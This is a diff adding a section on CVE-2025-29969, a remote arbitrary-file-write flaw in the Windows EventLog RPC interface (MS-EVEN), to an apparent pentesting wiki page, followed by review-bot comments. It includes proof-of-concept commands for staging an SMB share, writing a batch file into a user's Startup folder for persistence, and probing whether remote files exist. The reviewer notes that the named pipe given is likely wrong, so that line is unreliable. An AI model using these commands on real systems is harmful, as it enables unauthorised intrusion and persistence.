32 changes: 32 additions & 0 deletions src/network-services-pentesting/135-pentesting-msrpc.md
@@ -69,6 +69,36 @@ All options except `tcp_dcerpc_auditor` are specifically designed for targeting
- **Named Pipe**: `\pipe\epmapper`
- **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM.


### MS-EVEN (EventLog Remoting) primitives

The **MS-EVEN** RPC interface (named pipe `\pipe\even`) exposes Eventlog operations. SafeBreach’s **CVE-2025-29969 (EventLog-in)** analysis shows a **TOCTOU** flaw in MS-EVEN that lets an **authenticated low-privileged** user trigger a **remote arbitrary file write** on the target: attacker-chosen content written to an attacker-chosen path without needing Administrator rights for the remote write.

Operational pattern (PoC workflow): stage a **valid EVTX** plus your payload on an SMB share, then race the MS-EVEN logic so the target fetches the SMB-hosted file and writes it to the chosen path.

```bash
impacket-smbserver -smb2support Share /tmp/safebreach
```

The published PoC uses a **hard-coded SMB share name** (`Share`), so if you change it you must also update the script.

```bash
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\Users\lowuser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\target.bat"
```

A common chain is to drop into a **per-user Startup folder** for persistence and execution on the next logon (execution occurs in that user context).

#### MS-EVEN CreateFile-style primitive for recon

MS-EVEN also exposes a **file open/create** primitive (described in the PoC as `CreateFile`) that can be used by any authenticated user to **probe whether a remote file or directory exists**. This is useful for software discovery by checking common install paths (e.g., `C:\Program Files\<Vendor>`):

```bash
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"

Result:
FILE_EXISTS_AND_IS_DIRECTORY
```

### Identifying IP addresses

Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), comes from [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) is possible to abuse the _**ServerAlive2**_ method inside the _**IOXIDResolver**_ interface.
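Review bot: The named pipe given for MS-EVEN (`\pipe\even`) does not match the endpoint defined by the [MS-EVEN] specification, which is `\PIPE\eventlog` over ncacn_np; please correct it, because readers will use this line to pick the pipe when enumerating or binding. Three smaller points in the same hunk. The `write_file_remotely.py` invocation takes two IP addresses plus a local EVTX path, a payload name and a target path, but the text never says which address is the attacker's SMB host and which is the target, nor whether the local EVTX path has to sit under the directory exported as `Share` (the example suggests it does, since `/tmp/safebreach` is the exported directory); a one-line argument legend next to the hard-coded-share remark would remove the guesswork. The Startup-folder example writes into `lowuser`'s own profile, a location that account can already write to, so the persistence paragraph should state what the Eventlog-service write buys over a plain SMB write with the same credentials, or use a destination that the low-privileged user could not otherwise reach. Finally, the `check_if_exists.py` fence mixes the command with its `Result:` output in one `bash` block; split the output into its own block or prefix it so the command stays copy-pasteable.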
@@ -226,6 +256,8 @@ A single out-of-bounds write or unexpected exception will be surfaced immediatel

## References

- [EventLogin-CVE-2025-29969 (SafeBreach-Labs)](https://github.com/SafeBreach-Labs/EventLogin-CVE-2025-29969)
- [EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows](https://www.safebreach.com/blog/safebreach_labs_discovers_cve-2025-29969/)
- [Automating MS-RPC vulnerability research (2025, Incendium.rocks)](https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/)
- [MS-RPC-Fuzzer – context-aware RPC fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer)
- [NtObjectManager PowerShell module](https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/master/NtObjectManager)
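Review bot: The two added references cover only the PoC repository and the vendor blog; since the new section names the MS-EVEN interface and its named pipe, and asserts that an authenticated low-privileged user is enough, please also add the [MS-EVEN] protocol specification page on Microsoft Learn and Microsoft's own advisory entry for CVE-2025-29969, so readers can verify the endpoint name and check the affected and patched builds, neither of which the section states. The entries otherwise follow the list's existing `- [title](url)` style and its newest-first ordering, which is fine.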